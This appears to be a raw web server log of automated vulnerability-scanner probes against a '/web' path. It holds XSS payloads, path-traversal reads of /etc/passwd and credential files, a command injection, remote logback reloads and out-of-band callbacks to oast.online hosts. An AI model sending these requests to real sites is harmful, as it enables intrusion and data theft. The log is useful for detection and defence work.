/web/casmain.xgi
/web/resin-doc/viewfile/?file=index.jsp
/web/%20../web-inf/
/web/gotoURL.asp?url=google.com&id=43569
/web/WAN_wan.htm?.gif
/web
/web/jars/upload
/web/wp-admin/install.php
/web/upload/UploadResourcePic.ashx?ResourceID=8382
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/wp-login.php?action=register
/web/wp-admin/maint/repair.php
/web/xmlrpc.php
/web/casmain.xgi
/web/resin-doc/viewfile/?file=index.jsp
/web/jars/upload
/web/WAN_wan.htm?.gif
/web
/web/wp-admin/install.php
/web/upload/UploadResourcePic.ashx?ResourceID=8382
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/%20../web-inf/
/web/v2/query
/web/WAN_wan.htm?.gif
/web/xmlrpc.php
/web/wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ==
/web/rootDesc.xml
/web/WAN_wan.htm?.gif
/web/v2/query
/web/guest_auth/guestIsUp.php
/web/
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/auth/realms/master/clients-registrations/openid-connect
/web/wp-content/plugins/1-flash-gallery/
/web/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E
/web/wp-content/plugins/easy-media-gallery-pro/
/web/login.php
/web/(download)/tmp/poc.txt
/web/wp-content/uploads/pdf-invoices/
/web/search.php?searchtype=5
/web/wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ==
/web/rootDesc.xml
/web/fpui/loginServlet
/web/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc
/web/guest_auth/guestIsUp.php
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web
/web/wp-content/plugins/1-flash-gallery/
/web/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E
/web/wp-content/plugins/easy-media-gallery-pro/
/web/auth/realms/master/clients-registrations/openid-connect
/web/login.php
/web/wp-content/uploads/pdf-invoices/
/web/search.php?searchtype=5
/web/(download)/tmp/poc.txt
/web/fpui/loginServlet
/web/rest/api/2/resolution
/web/blog/wp-content/plugins/1-flash-gallery/
/web/wp-content/plugins/redirection/
/web/yyoa/ext/https/getSessionList.jsp?cmd=getAll
/web/password.cgi
/web/ispirit/interface/gateway.php
/web/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/rest/api/2/projectCategory?maxResults=1000
/web/
/web/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/rest/api/2/screens
/web/wp-content/plugins/ultimate-member/
/web
/web/rest/api/2/resolution
/web/blog/wp-content/plugins/1-flash-gallery/
/web/yyoa/ext/https/getSessionList.jsp?cmd=getAll
/web/wp-content/plugins/redirection/
/web/wp-content/uploads/
/web/ispirit/interface/gateway.php
/web/password.cgi
/web/debug.php
/web/users/sign_in
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/rest/api/2/projectCategory?maxResults=1000
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/rest/api/2/screens
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/wp-content/themes/
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/login.php/'%3E%3Csvg/onload=alert%6025SnmIcLC4GSscMcQ5BS8qEsUML%60%3E
/web/db_dump.php
/web/cgi-bin/login.cgi
/web/wp-includes/ALFA_DATA/
/web/wp-content/themes/haberadam/api/mobile-info.php?id=
/web/ui/login.php?user=admin
/web/script/
/web/include/thumb.php?dir=http/.....///.....///config/config_db.php
/web/index.php?m=member&f=login_save
/web/xmlrpc.php
/web/stat.jsp?cmd=chcp+437+%7c+dir
/web/
/web/include/thumb.php?dir=.....///http/.....///config/config_db.php
/web/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E
/web/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/
/web/blog/wp-content/themes/haberadam/api/mobile-info.php?id=
/web/dev/tests/functional/credentials.xml.dist
/web/users/sign_in
/web/wp-content/themes/altair/modules/
/web/wp-content/themes/altair/functions/
/web/wp-content/themes/altair/images/flip/
/web/wp-content/themes/altair/images/
/web/ui/api/v1/global-search/builds?jfLoader=true
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/wp-content/themes/
/web/login.php/'%3E%3Csvg/onload=alert%6025SnmIcLC4GSscMcQ5BS8qEsUML%60%3E
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/ui/login.php?user=admin
/web/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E
/web/rest/menu/latest/admin
/web/db_dump.php
/web/include/thumb.php?dir=.....///http/.....///config/config_db.php
/web/script/
/web/wp-content/plugins/
/web
/web/blog/wp-content/themes/haberadam/api/mobile-info.php?id=
/web/cgi-bin/login.cgi
/web/index.php?m=member&f=login_save
/web/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/
/web/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E
/web/dev/tests/functional/credentials.xml.dist
/web
/web/Upload/upload_file.php?l=test
/web/ALFA_DATA/alfacgiapi/
/web/solr/admin/cores?wt=json
/web/fpui/jsp/index.jsp
/web/dev/tests/functional/etc/config.xml.dist
/web/v1/agent/service/register
/web/25SnmJujIVh1aSQnDamnPs1WzFH.php
/web/wp-content/plugins/
/web
/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E
/web/rest/menu/latest/admin
/web/wp-includes/
/web/cgi-bin/status
/web/Upload/test/test.php
/web/ui/api/v1/global-search/builds?jfLoader=true
/web/v1/submissions
http://c8acjap9m8v98g1htghgcekcupoyyyyba.oast.online/
/web/php/ping.php
/web/?author=1
/web/fpui/jsp/index.jsp
/web/feed/rdf
/web/v1/agent/service/register
/web/25SnmJujIVh1aSQnDamnPs1WzFH.php
/web/?mel=9
/web/dev/tests/functional/etc/config.xml.dist
/web/cgi-bin/ALFA_DATA/alfacgiapi/
/web/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml
/web/wp-includes/
/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E
/web/wp-content/plugins/iwp-client/
/web/feed/rdf
/web/cgi-bin/status
/web/php/ping.php
/web/v1/submissions
/web/Upload/test/test.php
/web/cgi-bin/ALFA_DATA/alfacgiapi/
/web/
/web/?author=1
/web/sys/ui/extend/varkind/custom.jsp
/web/wp-content/plugins/iwp-client/
/web/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml
/web/index.php?s=/home/page/uploadImg
/web/asynchPeople/
/web/http/index.php
@c8acjap9m8v98g1htghgcekcuqeyyyybh.oast.online/
/web/dashboard/proc.php?type=login
/web/lan.html
/web/wp-content/uploads/data.txt
/web/?mel=9
c8acjap9m8v98g1htghgcekcuqayyyyb6.oast.online:80/
/web/wp-content/plugins/elementor/
/web/
/web/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SnmLk9MNa72UAISlihXxDaZJE')%3elujb7/admin/imgProcess.cfm
/web/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml
/web/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E
/web/sys/ui/extend/varkind/custom.jsp
/web/?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ==
/web/http/index.php
/web/index.php?s=/home/page/uploadImg
/web/http/index.php
/web/dashboard/proc.php?type=login
/web/lan.html
/web/wp-content/uploads/data.txt
/web/asynchPeople/
/web/
/web/_users/_all_docs
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/secure/popups/UserPickerBrowser.jspa
/web/wp-content/themes/prostore/go.php?https://example.com/
/web/sys/ui/extend/varkind/custom.jsp
/web/wp-content/plugins/updraftplus/includes/
/web/wp-content/uploads/wpdm-cache/
/web/wp-content/plugins/sfwd-lms/
/web/rest/config/1.0/directory
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/?s=index/index/index
/web/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/web/wp-content/plugins/elementor/
/web/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SnmLk9MNa72UAISlihXxDaZJE')%3elujb7/admin/imgProcess.cfm
/web/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml
/web/search
/web/wp-config-sample.php
/web/css_parser.php?css=css_parser.php
/web/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SnmLk9MNa72UAISlihXxDaZJE')%3elujb7/admin/imgProcess.cfm
/web/directdata/direct/router
/web/page/exportImport/uploadOperation.jsp
/web//netcore_get.cgi
/web/wp-content/plugins/gtranslate/
/web/http/index.php
/web/_users/_all_docs
/web/wp-content/uploads/wpdm-cache/
/web/wp-content/themes/prostore/go.php?https://example.com/
/web/secure/popups/UserPickerBrowser.jspa
/web/wp-content/plugins/sfwd-lms/
/web/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/web/wp-content/plugins/boldgrid-backup/cron/restore-info.json
/web/rest/config/1.0/directory
/web/directdata/direct/router
/web/v1/query
/web/poc.txt
/web/sys/ui/extend/varkind/custom.jsp
/web/search
/web/page/exportImport/uploadOperation.jsp
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web
/web/mifs/j_spring_security_check
/web/
/web/page/exportImport/fileTransfer/poc.jsp
/web/cgi-bin/jarrewrite.sh
/web/poc.txt
/web/wp-content/plugins/123contactform-for-wordpress/
/web/rest/api/2/project?maxResults=100
/web/index.php?s=captcha
/web/wp-content/plugins/boldgrid-backup/cron/restore-info.json
/web/webmail/basic/
/web/v1/query
/web/poc.txt
/web/api/system/deviceinfo
/web/?{alert(1)}
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web/eam/vib?id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties
/web
/web/xml/User/User.xml
/web/mifs/j_spring_security_check
/web/MUP/
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/page/exportImport/fileTransfer/poc.jsp
/web/cgi-bin/jarrewrite.sh
/web/rest/api/2/project?maxResults=100
/web/wp-content/plugins/123contactform-for-wordpress/
/web/
/web/fileDownload?action=downloadBackupFile
/web/_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E
/web/wp-content/themes/Attitude/go.php?https://example.com/
/web/ueditor/net/controller.ashx?action=catchimage&encode=utf-8
/web/rest/V1/products
/web/fileDownload?action=downloadBackupFile
/web/?{alert(1)}
/web/api/system/deviceinfo
/web/MUP/
/web/index.php
/web/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e
/web/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/plugin/add
/web/actuator/env
/web/xml/User/User.xml
/web/wp-content/plugins/wpmudev-updates/keys/
/web/thruk/cgi-bin/login.cgi
/web/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/web/wp-content/plugins/wordpress-popup/views/admin/
/web/wp-content/plugins/email-subscribers
/web/plugin/customMethod
/web/boardDataWW.php
/web/fileDownload?action=downloadBackupFile
/web/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml
/web/overview.asp
/web/rest/V1/products
/web/boaform/admin/formTracert
/web/_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E
/web/fileDownload?action=downloadBackupFile
/web/.antproxy.php
/web/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/web/fileDownload?action=downloadBackupFile
/web/rest/V1/store/storeConfigs
/web/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
/web/
/web/index.php
/web/lcms/index.php
/web/
/web/
/web/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e
/HelpTheHelpDesk.jsdbx
/web/client
/web/xmlrpc.php
/web/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")
/web/actuator/env
/web/thruk/cgi-bin/login.cgi
/web/emergency.php
/web/user.php?act=login
/web/wp-content/themes/Grimag/go.php?https://example.com
/web/wp-content/plugins/wordpress-popup/views/admin/
/web/wp-content/plugins/email-subscribers
/web/wp-content/backup-db/
/web/var/resource_config.json
/web/license.txt
/web/wp-content/plugins/woocommerce/
/web/login.php
/web/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml
/web/%20../web-inf/web.xml
/web/
/web/.antproxy.php
/web/boaform/admin/formTracert
/web/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/web/rest/V1/store/storeConfigs
/web/wp-content/plugins/music-store/ms-core/ms-submit.php
/web/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
/web/
/web/wp-content/plugins/mstore-api/
/web/wp-content/plugins/idx-broker-platinum/
/web/rest/V1/store/storeViews
/web/lcms/index.php
/web/wp-content/plugins/super-forms/
/web/webadm/?q=moni_detail.do&action=gragh
/web/
/web/hoteldruid/inizio.php
/HelpTheHelpDesk.jsdbx
/web/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
/web/inizio.php
/web/(download)/etc/passwd
/web/
/web/interlib/report/ShowImage?localPath=C:\Windows\system.ini
/web/wp-content/backup-db/
/web/'
/web/wp-content/plugins/arforms/
/web/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com
/web/install/install.php?step=4
/web/login.php
/web/adjuncts/3a890183/
/web/wp-content/plugins/easy-wp-smtp/
/web/wp-content/plugins/mstore-api/
/web/wp-content/plugins/idx-broker-platinum/
/web/wp-content/plugins/music-store/ms-core/ms-submit.php
/web/rest/V1/store/storeViews
/web/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com
/web/wp-content/plugins/easy-wp-smtp/
/web/'
/web/install/includes/configure.php
/web/inizio.php
/web/wp-content/plugins/arforms/
/web/
/web/webadm/?q=moni_detail.do&action=gragh
/web/(download)/etc/passwd
/web/wp-admin/setup-config.php?step=1
/web/api/v1/method.callAnon/cve_exploit
/web/wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip
/web/wp-content/plugins/simple-file-list/ee-upload-engine.php
/web/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
/web/adjuncts/3a890183/
/web/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=
/web
/web/wp-content/plugins/wp-mail-smtp/
/web/wp-admin/admin-ajax.php?action=action_name
/web/
/web/wp-content/plugins/wp-mail-smtp-pro/
/web/ws/v1/cluster/apps/new-application
/web/api/user/reg
/web/installer-log.txt
/web/wp-content/uploads/database-backups/
/web/install/includes/configure.php
/web/?author=1
/web/scrm/crm/admin
/web/servicedesk/customer/user/signup
/web/
/web/wp-admin/setup-config.php?step=1
/web/api/v1/method.callAnon/cve_exploit
/web/jolokia/
/web/wp-content/plugins/simple-file-list/ee-upload-engine.php
/web/api/v1/method.callAnon/cve_exploit
/web
/web/wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip
/web/wp-content/plugins/simple-file-list/ee-file-engine.php
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=
/web
/web/wp-json/wp/v2/lesson/1
/web/ws/v1/cluster/apps/new-application
/web/api/user/reg
/web/wp-content/plugins/wp-mail-smtp-pro/
/web/lib///....//....//....//....//....//....//....//....//etc//passwd
/web/wp-admin/admin-ajax.php?action=action_name
/web/wp-content/uploads/database-backups/
/web/wp-content/plugins/bbpress/
/web/index.php?action=login.index
/web/
/web/xmlrpc/pingback
/web/jolokia/
/web/servicedesk/customer/user/signup
/web/?author=1
/web/api/v1/method.callAnon/cve_exploit
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1
/web/api/group/list
/web/wp-json/wp/v2/lesson/1
/web/hedwig.cgi
/web/etc/passwd
/web/api/login
/web/wp-content/plugins/simple-file-list/ee-file-engine.php
/web/webtools/control/main
/web/?a=display&templateFile=README.md
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/web/zms/admin/index.php
/web/wp-content/uploads/simple-file-list/nuclei.php
/web/cgi-bin/slogin/login.py
/web/portal/info.jsp
/web/wp-includes/rss-functions.php
/web/wp-content/plugins/bbpress/
/web/wp-config-backup.txt
/web/rest/api/2/dashboard?maxResults=100
/web/index.php?action=login.index
/web/wp-content/plugins/lifterlms/
/web/?author=1
/web/xmlrpc/pingback
/web/ftb.imagegallery.aspx
/web/phpwiki/index.php/passwd
/web/lib/crud/userprocess.php
/web/
/web/
/web/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css
/web/etc/passwd
/web/api/login
/web/hedwig.cgi
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/web/zms/admin/index.php
/web/cgi-bin/slogin/login.py
/web/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/web/portal/info.jsp
/web/wp-config-backup.txt
/web/wp-content/plugins/lifterlms/
/web/phpwiki/index.php/passwd
/web/ftb.imagegallery.aspx
/web/lib/crud/userprocess.php
/web/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css
/web/
/web/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/web////example.com@/
/web/_wpeprivate/config.json
/web////example.com@/
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/web///%5C/example.com/
/web///%5Ctexample.com/
/web///example.com/
/web///example.com@/
/web///example.com%5Ctexample.com/
/web///https://example.com@/
/web//%5C/%5C/example.com/
/web//example.com/
/web//http://192.168.1.104example.com/
/web//http://192.168.1.104example.com/
/web/%5C/%5C/example.com/
/web/%5C/%5C/example.com/
/web/example.com/
/web/example.com/
/web/example.com/
/web/example.com;@
/web/example.com;@
/web/https%3a%2f%2fexample.com%2f
/web/https%3a%2f%2fexample.com%2f
/web/https://%2f%2f.example.com/
/web/https://%2f%2f.example.com/
/web/https://%3F.example.com/
/web/https://%5c%5c.example.com/
/web/https://%5cexample.com@
/web/https://%5cexample.com@
/web/https://%23.example.com/
/web/https://:80
/web/https://:80?@example.com/
/web/https://%5Ctexample.com/
/web/https://example.com/https://example.com/
